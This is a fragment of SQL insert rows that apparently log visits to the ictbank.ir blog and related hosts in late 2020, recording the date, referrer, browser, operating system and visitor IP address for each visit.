(6948,'2020-11-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.127','000',0,2,0),
(6949,'2020-11-29','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','3.226.122.188','000',0,1,0),
(6950,'2020-11-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(6951,'2020-11-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.45.244','000',0,1,0),
(6952,'2020-11-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.129','000',0,2,0),
(6953,'2020-11-29','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.205.56.217','000',0,1,0),
(6954,'2020-11-29','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','54.169.189.233','000',0,1,0),
(6955,'2020-11-29','http://design-arena.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','52.212.43.127','000',0,1,0),
(6956,'2020-11-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.202.152','000',0,1,0),
(6957,'2020-11-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(6958,'2020-11-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(6959,'2020-11-29','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','81.109.143.9','000',0,1,0),
(6960,'2020-11-29','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6961,'2020-11-29','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','185.191.204.6','000',0,1,0),
(6962,'2020-11-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,6,0),
(6963,'2020-11-30','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','207.180.226.247','000',0,150,0),
(6964,'2020-11-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.146.34','000',0,2,0),
(6965,'2020-12-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,4,0),
(6966,'2020-12-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','69.162.89.202','000',0,1,0),
(6967,'2020-12-01','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','89.248.172.208','000',0,1,0),
(6968,'2020-12-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,2,0),
(6969,'2020-12-02','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','52.191.141.32','000',0,3,0),
(6970,'2020-12-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.65.84','000',0,2,0),
(6971,'2020-12-02','http://82.102.9.14/blog','Chrome','OS X','10.14.6',NULL,NULL,'','54.245.28.210','000',0,1,0),
(6972,'2020-12-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','74.63.223.110','000',0,2,0),
(6973,'2020-12-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(6974,'2020-12-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,4,0),
(6975,'2020-12-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(6976,'2020-12-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.188.183.185','000',0,2,0),
(6977,'2020-12-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(6978,'2020-12-04','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','117.50.137.13','000',0,2,0),
(6979,'2020-12-04','http://82.102.9.14:80/blog','Chrome','Linux','Unknown',NULL,NULL,'','103.52.217.236','000',0,4,0),
(6980,'2020-12-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,5,0),
(6981,'2020-12-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(6982,'2020-12-04','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','79.127.96.129','000',0,2,0),
(6983,'2020-12-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','69.162.117.142','000',0,1,0),
(6984,'2020-12-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.138','000',0,1,0),
(6985,'2020-12-04','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.236.139.142','000',0,1,0),
(6986,'2020-12-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.42.250','000',0,1,0),
(6987,'2020-12-04','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','5.130.72.125','000',0,1,0),
(6988,'2020-12-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','69.175.89.170','000',0,1,0),
(6989,'2020-12-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(6990,'2020-12-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(6991,'2020-12-04','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','95.213.193.198','000',0,2,0),
(6992,'2020-12-04','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','95.105.124.159','000',0,3,0),
(6993,'2020-12-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','95.130.175.250','000',0,1,0),
(6994,'2020-12-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(6995,'2020-12-05','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','185.107.47.171','000',0,1,0),
(6996,'2020-12-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.237.24','000',0,2,0),
(6997,'2020-12-05','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,2,0),
(6998,'2020-12-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(6999,'2020-12-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(7000,'2020-12-05','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','14.177.158.118','000',0,1,0),
(7001,'2020-12-05','http://ictbank.ir/blog','WeChat','iOS','10.3.3',NULL,NULL,'','129.226.49.27','000',0,4,0),
(7002,'2020-12-05','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','89.199.83.33','000',0,1,0),
(7003,'2020-12-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.23.156','000',0,1,0),
(7004,'2020-12-05','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','138.122.192.18','000',0,2,0),
(7005,'2020-12-05','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.162.218','000',0,1,0),
(7006,'2020-12-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.27.212','000',0,1,0),
(7007,'2020-12-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(7008,'2020-12-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.147.205','000',0,1,0),
(7009,'2020-12-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(7010,'2020-12-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.66.114.153','000',0,1,0),
(7011,'2020-12-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','142.93.3.147','000',0,2,0),
(7012,'2020-12-06','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','185.92.149.234','000',0,1,0),
(7013,'2020-12-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(7014,'2020-12-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(7015,'2020-12-06','http://82.102.9.14/blog','Unknown','Unknown','Unknown',NULL,NULL,'','143.110.212.54','000',0,1,0),
(7016,'2020-12-06','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','3.238.24.149','000',0,1,0),
(7017,'2020-12-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.30.100','000',0,1,0),
(7018,'2020-12-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.171.83','000',0,1,0),
(7019,'2020-12-06','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.217.250.3','000',0,1,0),
(7020,'2020-12-06','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','45.85.241.217','000',0,1,0),
(7021,'2020-12-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.165.201','000',0,1,0),
(7022,'2020-12-06','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','122.51.53.50','000',0,3,0),
(7023,'2020-12-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(7024,'2020-12-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(7025,'2020-12-06','http://82.102.9.14/blog','Internet Explorer','Windows','Unknown',NULL,NULL,'','199.19.224.184','000',0,1,0),
(7026,'2020-12-06','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','104.248.236.204','000',0,1,0),
(7027,'2020-12-06','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.233.16.156','000',0,3,0),
(7028,'2020-12-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(7029,'2020-12-07','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','81.91.138.189','000',0,1,0),
(7030,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.136.91.215','000',0,1,0),
(7031,'2020-12-07','https://www.google.com/','Chrome','OS X','10.13.6',NULL,NULL,'','181.47.151.10','000',0,2,0),
(7032,'2020-12-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,5,0),
(7034,'2020-12-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(7035,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.202.76.139','000',0,1,0),
(7036,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.166.145','000',0,1,0),
(7037,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.38.227.167','000',0,2,0),
(7038,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','95.110.165.79','000',0,1,0),
(7039,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.5','000',0,1,0),
(7040,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.143','000',0,1,0),
(7041,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.142','000',0,1,0),
(7042,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.208.125','000',0,2,0),
(7043,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.23','000',0,1,0),
(7044,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','112.213.89.56','000',0,1,0),
(7045,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','41.78.128.131','000',0,1,0),
(7046,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.46.52.245','000',0,1,0),
(7047,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.209.238.226','000',0,1,0),
(7048,'2020-12-07','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','5.210.121.163','000',0,1,0),
(7049,'2020-12-07','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','77.243.191.40','000',0,2,0),
(7050,'2020-12-07','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','185.106.129.123','000',0,1,0),
(7051,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.120.73','000',0,1,0),
(7052,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,1,0),
(7053,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.51','000',0,1,0),
(7054,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.6','000',0,1,0),
(7055,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.44.4.203','000',0,1,0),
(7056,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.46.211','000',0,1,0),
(7057,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.7','000',0,1,0),
(7058,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.36','000',0,1,0),
(7059,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.11','000',0,1,0),
(7060,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.19','000',0,1,0),
(7061,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.27','000',0,1,0),
(7062,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','132.148.104.132','000',0,1,0),
(7063,'2020-12-07','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','45.141.156.68','000',0,2,0),
(7064,'2020-12-07','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.129.10.46','000',0,1,0),
(7065,'2020-12-07','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','142.4.30.19','000',0,1,0),
(7066,'2020-12-07','http://82.102.9.14/blog','Chrome','OS X','10.14.6',NULL,NULL,'','34.220.154.242','000',0,1,0),
(7067,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.89.127.167','000',0,1,0),
(7068,'2020-12-07','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.175.213.34','000',0,10,0),
(7069,'2020-12-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.147.205','000',0,1,0),
(7070,'2020-12-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(7071,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.37.227.145','000',0,1,0),
(7072,'2020-12-07','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','181.215.217.178','000',0,1,0),
(7073,'2020-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.245.49.116','000',0,10,0),
(7074,'2020-12-08','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','194.36.87.13','000',0,1,0),
(7075,'2020-12-08','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','185.94.192.94','000',0,2,0),
(7076,'2020-12-08','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','95.217.207.28','000',0,1,0),
(7077,'2020-12-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(7078,'2020-12-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(7079,'2020-12-08','http://www.google.com/','Chrome','Android','10',NULL,NULL,'','201.191.255.67','000',0,1,0),
(7080,'2020-12-08','http://82.102.9.14/blog','Chrome','OS X','10.14.6',NULL,NULL,'','35.161.148.194','000',0,1,0),
(7081,'2020-12-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.82.146','000',0,1,0),
(7082,'2020-12-08','http://82.102.9.14/blog','Unknown','Unknown','Unknown',NULL,NULL,'','134.122.44.181','000',0,1,0),
(7083,'2020-12-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(7084,'2020-12-08','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.45','000',0,1,0),
(7085,'2020-12-08','http://ictbank.ir/blog','Android Browser','Android','2.0',NULL,NULL,'','220.181.77.162','000',0,4,0),
(7086,'2020-12-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.23.97','000',0,1,0),
(7087,'2020-12-08','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.222.251.124','000',0,1,0),
(7088,'2020-12-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.208.134.190','000',0,2,0),
(7089,'2020-12-08','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.239.122.255','000',0,1,0),
(7090,'2020-12-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.154','000',0,1,0),
(7091,'2020-12-08','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(7092,'2020-12-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,6,0),
(7093,'2020-12-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(7094,'2020-12-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.166.166','000',0,2,0),
(7095,'2020-12-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','39.101.1.61','000',0,1,0),
(7096,'2020-12-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(7097,'2020-12-09','http://ictbank.ir/blog','Android Browser','Android','1.1',NULL,NULL,'','220.181.77.162','000',0,4,0),
(7098,'2020-12-09','http://82.102.9.14/blog','Internet Explorer','Windows','Unknown',NULL,NULL,'','199.19.224.184','000',0,1,0),
(7099,'2020-12-09','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','172.27.232.4','000',0,3,0),
(7100,'2020-12-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.65.84','000',0,1,0),
(7101,'2020-12-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.206.243','000',0,1,0),
(7102,'2020-12-09','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.180.154','000',0,1,0),
(7103,'2020-12-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7104,'2020-12-09','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.22','000',0,2,0),
(7105,'2020-12-09','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.204.46.154','000',0,10,0),
(7106,'2020-12-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.28.239','000',0,1,0),
(7107,'2020-12-09','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.217.244.205','000',0,1,0),
(7108,'2020-12-09','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','168.91.42.47','000',0,1,0),
(7109,'2020-12-09','http://ICTBANK.IR','Vivaldi','Windows','10.0',NULL,NULL,'','168.81.92.30','000',0,1,0),
(7110,'2020-12-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(7111,'2020-12-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.147.205','000',0,1,0),
(7112,'2020-12-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(7113,'2020-12-09','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.10','000',0,2,0),
(7114,'2020-12-09','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','176.111.173.38','000',0,1,0),
(7115,'2020-12-09','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','185.100.87.247','000',0,1,0),
(7116,'2020-12-10','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','95.217.207.28','000',0,1,0),
(7117,'2020-12-10','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','193.106.30.100','000',0,2,0),
(7118,'2020-12-10','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.10','000',0,2,0),
(7119,'2020-12-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.17','000',0,2,0),
(7120,'2020-12-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,4,0),
(7121,'2020-12-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.200.243','000',0,1,0),
(7122,'2020-12-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','163.172.70.88','000',0,1,0),
(7123,'2020-12-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(7124,'2020-12-10','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.219.98.113','000',0,1,0),
(7125,'2020-12-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.243.147','000',0,1,0),
(7126,'2020-12-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','185.156.73.64','000',0,1,0),
(7127,'2020-12-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7128,'2020-12-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(7129,'2020-12-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(7130,'2020-12-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,7,0),
(7131,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.33.2.18','000',0,1,0),
(7132,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.129.172','000',0,1,0),
(7133,'2020-12-11','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','35.245.188.175','000',0,6,0),
(7134,'2020-12-11','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','87.55.192.72','000',0,1,0),
(7135,'2020-12-11','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.238.205.245','000',0,1,0),
(7136,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.166.95','000',0,1,0),
(7137,'2020-12-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.250','000',0,1,0),
(7138,'2020-12-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(7139,'2020-12-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.189.12.97','000',0,1,0),
(7140,'2020-12-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(7141,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.89.20.50','000',0,1,0),
(7142,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.213.82.137','000',0,1,0),
(7143,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.194.48','000',0,1,0),
(7144,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.89.225.2','000',0,1,0),
(7145,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.129.227.58','000',0,1,0),
(7146,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.208.52','000',0,1,0),
(7147,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.28','000',0,1,0),
(7148,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.106','000',0,1,0),
(7149,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.60','000',0,1,0),
(7150,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.176.125','000',0,1,0),
(7151,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','81.88.49.20','000',0,1,0),
(7152,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,1,0),
(7153,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.101','000',0,1,0),
(7154,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.77.32.217','000',0,1,0),
(7155,'2020-12-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.111.106.179','000',0,1,0),
(7156,'2020-12-12','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','175.24.102.153','000',0,1,0),
(7157,'2020-12-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.13','000',0,20,0),
(7158,'2020-12-12','http://ictbank.ir/blog','Android Browser','Android','1.1',NULL,NULL,'','220.181.77.162','000',0,2,0),
(7159,'2020-12-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(7160,'2020-12-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','74.63.223.110','000',0,1,0),
(7161,'2020-12-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(7162,'2020-12-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','95.217.207.28','000',0,2,0),
(7163,'2020-12-12','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.102.144.121','000',0,1,0),
(7164,'2020-12-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.76.117','000',0,1,0),
(7165,'2020-12-12','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','129.211.25.200','000',0,2,0),
(7166,'2020-12-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','168.119.101.117','000',0,1,0),
(7167,'2020-12-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','151.240.76.201','000',0,2,0),
(7168,'2020-12-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(7169,'2020-12-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.31.99','000',0,1,0),
(7170,'2020-12-12','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.83.20.82','000',0,1,0),
(7171,'2020-12-12','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(7172,'2020-12-12','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','168.81.93.121','000',0,1,0),
(7173,'2020-12-12','http://ictbank.ir/blog','WeChat','iOS','10.3.3',NULL,NULL,'','129.226.117.62','000',0,4,0),
(7174,'2020-12-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','2.50.176.252','000',0,2,0),
(7175,'2020-12-12','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','103.10.86.198','000',0,3,0),
